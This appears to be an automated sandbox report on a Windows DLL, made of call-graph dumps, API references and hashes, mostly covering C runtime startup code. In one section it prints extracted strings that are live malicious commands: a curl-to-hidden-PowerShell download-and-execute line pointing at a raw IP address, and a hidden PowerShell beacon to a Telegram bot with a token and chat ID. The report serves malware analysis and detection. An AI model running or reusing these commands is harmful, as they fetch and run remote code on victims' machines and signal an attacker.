9109->9084 9111 6f953858 DeleteCriticalSection 9110->9111 9111->9109 9111->9111 9117 6f953d03 9112->9117 9115 6f953e73 InitializeCriticalSectionAndSpinCount 9116 6f953e5e 9115->9116 9116->9096 9118 6f953d1b 9117->9118 9119 6f953d3e 9117->9119 9118->9119 9123 6f953c69 9118->9123 9119->9115 9119->9116 9122 6f953d30 GetProcAddress 9122->9119 9129 6f953c75 ___vcrt_FlsFree 9123->9129 9124 6f953ce9 9124->9119 9124->9122 9125 6f953c8b LoadLibraryExW 9126 6f953cf0 9125->9126 9127 6f953ca9 GetLastError 9125->9127 9126->9124 9128 6f953cf8 FreeLibrary 9126->9128 9127->9129 9128->9124 9129->9124 9129->9125 9130 6f953ccb LoadLibraryExW 9129->9130 9130->9126 9130->9129 9132 6f953d03 ___vcrt_FlsFree 5 API calls 9131->9132 9133 6f953d66 9132->9133 9134 6f953d7f TlsAlloc 9133->9134 9135 6f9537c3 9133->9135 9135->9103 9136 6f953dfd 9135->9136 9137 6f953d03 ___vcrt_FlsFree 5 API calls 9136->9137 9138 6f953e17 9137->9138 9139 6f953e32 TlsSetValue 9138->9139 9140 6f9537dc 9138->9140 9139->9140 9140->9106 9141 6f9537ec 9140->9141 9142 6f9537fc 9141->9142 9143 6f9537f6 9141->9143 9142->9103 9145 6f953d87 9143->9145 9146 6f953d03 ___vcrt_FlsFree 5 API calls 9145->9146 9147 6f953da1 9146->9147 9148 6f953db9 TlsFree 9147->9148 9149 6f953dad 9147->9149 9148->9149 9149->9142 9151 6f959778 9150->9151 9152 6f952433 9150->9152 9151->9152 9154 6f95962c 9151->9154 9152->9061 9152->9088 9155 6f959633 9154->9155 9156 6f959676 GetStdHandle 9155->9156 9157 6f9596d8 9155->9157 9158 6f959689 GetFileType 9155->9158 9156->9155 9157->9151 9158->9155 9160 6f952455 9159->9160 9161 6f952451 9159->9161 9162 6f9525ab __DllMainCRTStartup@12 4 API calls 9160->9162 9164 6f952462 ___scrt_release_startup_lock 9160->9164 9161->9065 9163 6f9524cb 9162->9163 9164->9065 9171 6f95653b 9165->9171 9168 6f9531f7 9237 6f9536e3 9168->9237 9172 6f956545 9171->9172 9174 6f9523a0 9171->9174 9173 6f9593b7 _unexpected 6 API calls 9172->9173 9175 6f95654c 9173->9175 9174->9168 9175->9174 9176 6f9593f6 _unexpected 6 API calls 
9175->9176 9177 6f95655f 9176->9177 9179 6f956402 9177->9179 9180 6f95640d 9179->9180 9181 6f95641d 9179->9181 9185 6f956423 9180->9185 9181->9174 9184 6f956a8e __freea 14 API calls 9184->9181 9186 6f95643e 9185->9186 9187 6f956438 9185->9187 9189 6f956a8e __freea 14 API calls 9186->9189 9188 6f956a8e __freea 14 API calls 9187->9188 9188->9186 9190 6f95644a 9189->9190 9191 6f956a8e __freea 14 API calls 9190->9191 9192 6f956455 9191->9192 9193 6f956a8e __freea 14 API calls 9192->9193 9194 6f956460 9193->9194 9195 6f956a8e __freea 14 API calls 9194->9195 9196 6f95646b 9195->9196 9197 6f956a8e __freea 14 API calls 9196->9197 9198 6f956476 9197->9198 9199 6f956a8e __freea 14 API calls 9198->9199 9200 6f956481 9199->9200 9201 6f956a8e __freea 14 API calls 9200->9201 9202 6f95648c 9201->9202 9203 6f956a8e __freea 14 API calls 9202->9203 9204 6f956497 9203->9204 9205 6f956a8e __freea 14 API calls 9204->9205 9206 6f9564a5 9205->9206 9211 6f95624f 9206->9211 9212 6f95625b CallCatchBlock 9211->9212 9227 6f956933 EnterCriticalSection 9212->9227 9214 6f95628f 9228 6f9562ae 9214->9228 9216 6f956265 9216->9214 9218 6f956a8e __freea 14 API calls 9216->9218 9218->9214 9219 6f9562ba 9220 6f9562c6 CallCatchBlock 9219->9220 9232 6f956933 EnterCriticalSection 9220->9232 9222 6f9562d0 9223 6f9564f0 _unexpected 14 API calls 9222->9223 9224 6f9562e3 9223->9224 9233 6f956303 9224->9233 9227->9216 9231 6f95697b LeaveCriticalSection 9228->9231 9230 6f95629c 9230->9219 9231->9230 9232->9222 9236 6f95697b LeaveCriticalSection 9233->9236 9235 6f9562f1 9235->9184 9236->9235 9238 6f9536f0 9237->9238 9244 6f9523a5 9237->9244 9239 6f9536fe 9238->9239 9245 6f953dc2 9238->9245 9241 6f953dfd ___vcrt_FlsSetValue 6 API calls 9239->9241 9242 6f95370e 9241->9242 9250 6f9536c7 9242->9250 9244->9001 9246 6f953d03 ___vcrt_FlsFree 5 API calls 9245->9246 9247 6f953ddc 9246->9247 9248 6f953df4 TlsGetValue 9247->9248 9249 6f953de8 9247->9249 9248->9249 9249->9239 9251 6f9536d1 9250->9251 9252 6f9536de 
9250->9252 9251->9252 9253 6f9555ad ___vcrt_freefls@4 14 API calls 9251->9253 9252->9244 9253->9252 9260 6f953727 9254->9260 9256 6f952381 9256->9024 9257 6f955faf 9256->9257 9258 6f9566b8 __dosmaperr 14 API calls 9257->9258 9259 6f95238d 9258->9259 9259->9027 9259->9028 9261 6f953730 9260->9261 9262 6f953733 GetLastError 9260->9262 9261->9256 9263 6f953dc2 ___vcrt_FlsGetValue 6 API calls 9262->9263 9264 6f953748 9263->9264 9265 6f9537ad SetLastError 9264->9265 9266 6f953dfd ___vcrt_FlsSetValue 6 API calls 9264->9266 9273 6f953767 9264->9273 9265->9256 9267 6f953761 CallUnexpected 9266->9267 9269 6f953dfd ___vcrt_FlsSetValue 6 API calls 9267->9269 9271 6f953789 9267->9271 9267->9273 9268 6f953dfd ___vcrt_FlsSetValue 6 API calls 9270 6f95379d 9268->9270 9269->9271 9272 6f9555ad ___vcrt_freefls@4 14 API calls 9270->9272 9271->9268 9271->9270 9272->9273 9273->9265 9275 6f9523e1 ___scrt_release_startup_lock 9274->9275 9276 6f9523e5 9275->9276 9278 6f9523f1 __DllMainCRTStartup@12 9275->9278 9277 6f955e19 __DllMainCRTStartup@12 14 API calls 9276->9277 9279 6f9523ef 9277->9279 9280 6f9523fe 9278->9280 9281 6f95519b CallUnexpected 21 API calls 9278->9281 9279->9036 9280->9036 9282 6f95535a 9281->9282 9282->9036 9295 6f9531aa InterlockedFlushSList 9283->9295 9287 6f952589 9286->9287 9291 6f951eea 9287->9291 9299 6f955fc2 9287->9299 9289 6f952597 9290 6f953202 ___scrt_uninitialize_crt 7 API calls 9289->9290 9290->9291 9292 6f951f26 9291->9292 9397 6f9523ff 9292->9397 9296 6f9522a2 9295->9296 9297 6f9531ba 9295->9297 9296->9041 9297->9296 9298 6f9555ad ___vcrt_freefls@4 14 API calls 9297->9298 9298->9297 9300 6f955fcd 9299->9300 9303 6f955fdf ___scrt_uninitialize_crt 9299->9303 9301 6f955fdb 9300->9301 9304 6f959e13 9300->9304 9301->9289 9303->9289 9307 6f959ca4 9304->9307 9310 6f959bf8 9307->9310 9311 6f959c04 CallCatchBlock 9310->9311 9318 6f956933 EnterCriticalSection 9311->9318 9313 6f959c0e ___scrt_uninitialize_crt 9314 6f959c7a 9313->9314 9319 6f959b6c 9313->9319 9327 
6f959c98 9314->9327 9318->9313 9320 6f959b78 CallCatchBlock 9319->9320 9330 6f959f30 EnterCriticalSection 9320->9330 9322 6f959b82 ___scrt_uninitialize_crt 9323 6f959bbb 9322->9323 9331 6f959dae 9322->9331 9344 6f959bec 9323->9344 9396 6f95697b LeaveCriticalSection 9327->9396 9329 6f959c86 9329->9301 9330->9322 9332 6f959dc3 _Deallocate 9331->9332 9333 6f959dd5 9332->9333 9334 6f959dca 9332->9334 9347 6f959d45 9333->9347 9335 6f959ca4 ___scrt_uninitialize_crt 68 API calls 9334->9335 9338 6f959dd0 9335->9338 9339 6f954c8c _Deallocate 39 API calls 9338->9339 9341 6f959e0d 9339->9341 9341->9323 9342 6f959df6 9360 6f95bd79 9342->9360 9395 6f959f44 LeaveCriticalSection 9344->9395 9346 6f959bda 9346->9313 9348 6f959d5e 9347->9348 9352 6f959d85 9347->9352 9349 6f95a149 ___scrt_uninitialize_crt 39 API calls 9348->9349 9348->9352 9350 6f959d7a 9349->9350 9371 6f95c598 9350->9371 9352->9338 9353 6f95a149 9352->9353 9354 6f95a155 9353->9354 9355 6f95a16a 9353->9355 9356 6f956a7b __dosmaperr 14 API calls 9354->9356 9355->9342 9357 6f95a15a 9356->9357 9358 6f954f50 __strnicoll 39 API calls 9357->9358 9359 6f95a165 9358->9359 9359->9342 9361 6f95bd8a 9360->9361 9364 6f95bd97 9360->9364 9362 6f956a7b __dosmaperr 14 API calls 9361->9362 9370 6f95bd8f 9362->9370 9363 6f95bde0 9365 6f956a7b __dosmaperr 14 API calls 9363->9365 9364->9363 9366 6f95bdbe 9364->9366 9367 6f95bde5 9365->9367 9382 6f95bcd7 9366->9382 9369 6f954f50 __strnicoll 39 API calls 9367->9369 9369->9370 9370->9338 9374 6f95c5a4 CallCatchBlock 9371->9374 9372 6f95c5ac 9372->9352 9373 6f95c5e5 9376 6f954ed3 _Deallocate 29 API calls 9373->9376 9374->9372 9374->9373 9375 6f95c62b 9374->9375 9377 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9375->9377 9376->9372 9378 6f95c631 9377->9378 9379 6f95c64f 9378->9379 9380 6f95c6a9 ___scrt_uninitialize_crt 62 API calls 9378->9380 9381 6f95c6a1 ___scrt_uninitialize_crt LeaveCriticalSection 9379->9381 9380->9379 9381->9372 9383 6f95bce3 CallCatchBlock 9382->9383 9384 
6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9383->9384 9385 6f95bcf2 9384->9385 9386 6f95bd37 9385->9386 9388 6f95bc6d ___scrt_uninitialize_crt 39 API calls 9385->9388 9387 6f956a7b __dosmaperr 14 API calls 9386->9387 9389 6f95bd3e 9387->9389 9390 6f95bd1e FlushFileBuffers 9388->9390 9392 6f95bd6d ___scrt_uninitialize_crt LeaveCriticalSection 9389->9392 9390->9389 9391 6f95bd2a GetLastError 9390->9391 9393 6f956a68 __dosmaperr 14 API calls 9391->9393 9394 6f95bd56 9392->9394 9393->9386 9394->9370 9395->9346 9396->9329 9402 6f955ff2 9397->9402 9400 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9401 6f951f2b 9400->9401 9401->9030 9405 6f956838 9402->9405 9406 6f956842 9405->9406 9407 6f952406 9405->9407 9409 6f959378 9406->9409 9407->9400 9410 6f9591f8 _unexpected 5 API calls 9409->9410 9411 6f959394 9410->9411 9412 6f9593af TlsFree 9411->9412 9413 6f95939d 9411->9413 9413->9407 9841 6f9596dc 9842 6f9596e8 CallCatchBlock 9841->9842 9853 6f956933 EnterCriticalSection 9842->9853 9844 6f9596ef 9854 6f95baf8 9844->9854 9847 6f95970d 9873 6f959733 9847->9873 9852 6f95962c 2 API calls 9852->9847 9853->9844 9855 6f95bb04 CallCatchBlock 9854->9855 9856 6f95bb0d 9855->9856 9857 6f95bb2e 9855->9857 9859 6f956a7b __dosmaperr 14 API calls 9856->9859 9876 6f956933 EnterCriticalSection 9857->9876 9861 6f95bb12 9859->9861 9860 6f95bb3a 9866 6f95bb66 9860->9866 9877 6f95ba48 9860->9877 9862 6f954f50 __strnicoll 39 API calls 9861->9862 9863 6f9596fe 9862->9863 9863->9847 9867 6f959576 GetStartupInfoW 9863->9867 9884 6f95bb8d 9866->9884 9868 6f959593 9867->9868 9870 6f959627 9867->9870 9869 6f95baf8 40 API calls 9868->9869 9868->9870 9871 6f9595bb 9869->9871 9870->9852 9871->9870 9872 6f9595eb GetFileType 9871->9872 9872->9871 9893 6f95697b LeaveCriticalSection 9873->9893 9875 6f95971e 9876->9860 9878 6f9578b8 _unexpected 14 API calls 9877->9878 9883 6f95ba5a 9878->9883 9879 6f95ba67 9880 6f956a8e __freea 14 API calls 9879->9880 9881 6f95babc 9880->9881 9881->9860 
9883->9879 9887 6f959438 9883->9887 9892 6f95697b LeaveCriticalSection 9884->9892 9886 6f95bb94 9886->9863 9888 6f9591f8 _unexpected 5 API calls 9887->9888 9889 6f959454 9888->9889 9890 6f959472 InitializeCriticalSectionAndSpinCount 9889->9890 9891 6f95945d 9889->9891 9890->9891 9891->9883 9892->9886 9893->9875 10036 6f9568cb 10039 6f956852 10036->10039 10040 6f95685e CallCatchBlock 10039->10040 10047 6f956933 EnterCriticalSection 10040->10047 10042 6f956896 10048 6f9568b4 10042->10048 10043 6f956868 10043->10042 10045 6f95a4ba __strnicoll 14 API calls 10043->10045 10045->10043 10047->10043 10051 6f95697b LeaveCriticalSection 10048->10051 10050 6f9568a2 10051->10050 10355 6f959ee4 10356 6f959e13 ___scrt_uninitialize_crt 68 API calls 10355->10356 10357 6f959eec 10356->10357 10365 6f95c8c5 10357->10365 10359 6f959ef1 10375 6f95c970 10359->10375 10362 6f959f1b 10363 6f956a8e __freea 14 API calls 10362->10363 10364 6f959f26 10363->10364 10366 6f95c8d1 CallCatchBlock 10365->10366 10379 6f956933 EnterCriticalSection 10366->10379 10368 6f95c948 10386 6f95c967 10368->10386 10369 6f95c8dc 10369->10368 10371 6f95c91c DeleteCriticalSection 10369->10371 10380 6f95d210 10369->10380 10374 6f956a8e __freea 14 API calls 10371->10374 10374->10369 10376 6f95c987 10375->10376 10378 6f959f00 DeleteCriticalSection 10375->10378 10377 6f956a8e __freea 14 API calls 10376->10377 10376->10378 10377->10378 10378->10359 10378->10362 10379->10369 10381 6f95d223 _Deallocate 10380->10381 10389 6f95d0eb 10381->10389 10383 6f95d22f 10384 6f954c8c _Deallocate 39 API calls 10383->10384 10385 6f95d23b 10384->10385 10385->10369 10474 6f95697b LeaveCriticalSection 10386->10474 10388 6f95c954 10388->10359 10390 6f95d0f7 CallCatchBlock 10389->10390 10391 6f95d124 10390->10391 10392 6f95d101 10390->10392 10399 6f95d11c 10391->10399 10400 6f959f30 EnterCriticalSection 10391->10400 10393 6f954ed3 _Deallocate 29 API calls 10392->10393 10393->10399 10395 6f95d142 10401 6f95d182 10395->10401 10397 6f95d14f 
10415 6f95d17a 10397->10415 10399->10383 10400->10395 10402 6f95d18f 10401->10402 10403 6f95d1b2 10401->10403 10404 6f954ed3 _Deallocate 29 API calls 10402->10404 10405 6f959d45 ___scrt_uninitialize_crt 64 API calls 10403->10405 10406 6f95d1aa 10403->10406 10404->10406 10407 6f95d1ca 10405->10407 10406->10397 10408 6f95c970 14 API calls 10407->10408 10409 6f95d1d2 10408->10409 10410 6f95a149 ___scrt_uninitialize_crt 39 API calls 10409->10410 10411 6f95d1de 10410->10411 10418 6f95d9fc 10411->10418 10414 6f956a8e __freea 14 API calls 10414->10406 10473 6f959f44 LeaveCriticalSection 10415->10473 10417 6f95d180 10417->10399 10420 6f95da25 10418->10420 10422 6f95d1e5 10418->10422 10419 6f95da74 10421 6f954ed3 _Deallocate 29 API calls 10419->10421 10420->10419 10423 6f95da4c 10420->10423 10421->10422 10422->10406 10422->10414 10425 6f95d96b 10423->10425 10426 6f95d977 CallCatchBlock 10425->10426 10433 6f95bb96 EnterCriticalSection 10426->10433 10428 6f95d985 10429 6f95d9b6 10428->10429 10434 6f95da9f 10428->10434 10447 6f95d9f0 10429->10447 10433->10428 10450 6f95bc6d 10434->10450 10436 6f95daaf 10437 6f95dab5 10436->10437 10439 6f95dae7 10436->10439 10440 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10436->10440 10463 6f95bbdc 10437->10463 10439->10437 10441 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10439->10441 10442 6f95dade 10440->10442 10443 6f95daf3 CloseHandle 10441->10443 10444 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10442->10444 10443->10437 10445 6f95daff GetLastError 10443->10445 10444->10439 10445->10437 10446 6f95db0d ___scrt_uninitialize_crt 10446->10429 10472 6f95bbb9 LeaveCriticalSection 10447->10472 10449 6f95d9d9 10449->10422 10451 6f95bc7a 10450->10451 10454 6f95bc8f 10450->10454 10452 6f956a68 __dosmaperr 14 API calls 10451->10452 10453 6f95bc7f 10452->10453 10456 6f956a7b __dosmaperr 14 API calls 10453->10456 10455 6f956a68 __dosmaperr 14 API calls 10454->10455 10457 6f95bcb4 10454->10457 10458 6f95bcbf 10455->10458 10459 6f95bc87 
10456->10459 10457->10436 10460 6f956a7b __dosmaperr 14 API calls 10458->10460 10459->10436 10461 6f95bcc7 10460->10461 10462 6f954f50 __strnicoll 39 API calls 10461->10462 10462->10459 10464 6f95bc52 10463->10464 10465 6f95bbeb 10463->10465 10466 6f956a7b __dosmaperr 14 API calls 10464->10466 10465->10464 10470 6f95bc15 10465->10470 10467 6f95bc57 10466->10467 10468 6f956a68 __dosmaperr 14 API calls 10467->10468 10469 6f95bc42 10468->10469 10469->10446 10470->10469 10471 6f95bc3c SetStdHandle 10470->10471 10471->10469 10472->10449 10473->10417 10474->10388 9414 6f95206a 9415 6f952073 9414->9415 9416 6f952078 9414->9416 9431 6f95223b 9415->9431 9420 6f951f34 9416->9420 9422 6f951f40 CallCatchBlock 9420->9422 9421 6f951f4f 9422->9421 9423 6f951f69 dllmain_raw 9422->9423 9424 6f951f64 __DllMainCRTStartup@12 9422->9424 9423->9421 9425 6f951f83 dllmain_crt_dispatch 9423->9425 9426 6f951fd5 9424->9426 9429 6f951e84 __DllMainCRTStartup@12 86 API calls 9424->9429 9425->9421 9425->9424 9426->9421 9427 6f951fde dllmain_crt_dispatch 9426->9427 9427->9421 9428 6f951ff1 dllmain_raw 9427->9428 9428->9421 9430 6f951fca dllmain_raw 9429->9430 9430->9426 9432 6f952251 9431->9432 9434 6f95225a 9432->9434 9435 6f9521ee GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9432->9435 9434->9416 9435->9434

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FDC
                                                                                                • GetExitCodeProcess.KERNELBASE(?,?), ref: 6F956FE9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FFE
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957009
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957014
                                                                                                • __dosmaperr.LIBCMT ref: 6F95701B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957026
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957031
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957043
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95704E
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95707F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2764183375-0
                                                                                                • Opcode ID: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction ID: a321e98985f0f9d9a18d7ef8a04501a5f8a3b317096c4e47111c4bc96319f699
                                                                                                • Opcode Fuzzy Hash: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction Fuzzy Hash: 49515B7190020CEBEF12DFA4C984AEE7BB9EF46315F108166E910A61D1D731DA78DF62

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951ECB
                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6F951EE5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2442719207-0
                                                                                                • Opcode ID: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction ID: e2276723bfa995d3542d43ed16c1eda4113e27017016161c2d1841421cb4f0a4
                                                                                                • Opcode Fuzzy Hash: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction Fuzzy Hash: 4D41D672D05715AFDB21CF69CC40BAE3AB9EF967A4F10411AE8146B2D1D730DDA1CBA0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,6417AA48,?,6F95923C,00000000,6F9510C9,00000000,00000000), ref: 6F9591EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • _strrchr.LIBCMT ref: 6F956CF9
                                                                                                • _strrchr.LIBCMT ref: 6F956D03
                                                                                                • _strrchr.LIBCMT ref: 6F956D18
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                  • Part of subcall function 6F954F7D: IsProcessorFeaturePresent.KERNEL32(00000017,6F954F4F,?,00000000,00000000,00000000,00000000,?,00000000,?,6F954EC6,?,00000000,00000000,00000000,00000000), ref: 6F954F7F
                                                                                                  • Part of subcall function 6F954F7D: GetCurrentProcess.KERNEL32(C0000417,00000000,?,00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA2
                                                                                                  • Part of subcall function 6F954F7D: TerminateProcess.KERNEL32(00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                                                • String ID: .com
                                                                                                • API String ID: 3694955208-4200470757

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                • cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, xrefs: 6F951010
                                                                                                • powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", xrefs: 6F95101D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: task
                                                                                                • String ID: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -$powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                                • API String ID: 1384045349-2968791885

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,6F95522C,00000000,6F954D53,?,?,6417AA48,6F954D53,?), ref: 6F955243
                                                                                                • TerminateProcess.KERNEL32(00000000,?,6F95522C,00000000,6F954D53,?,?,6417AA48,6F954D53,?), ref: 6F95524A
                                                                                                • ExitProcess.KERNEL32 ref: 6F95525C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0

                                                                                                Control-flow Graph

                                                                                                APIs
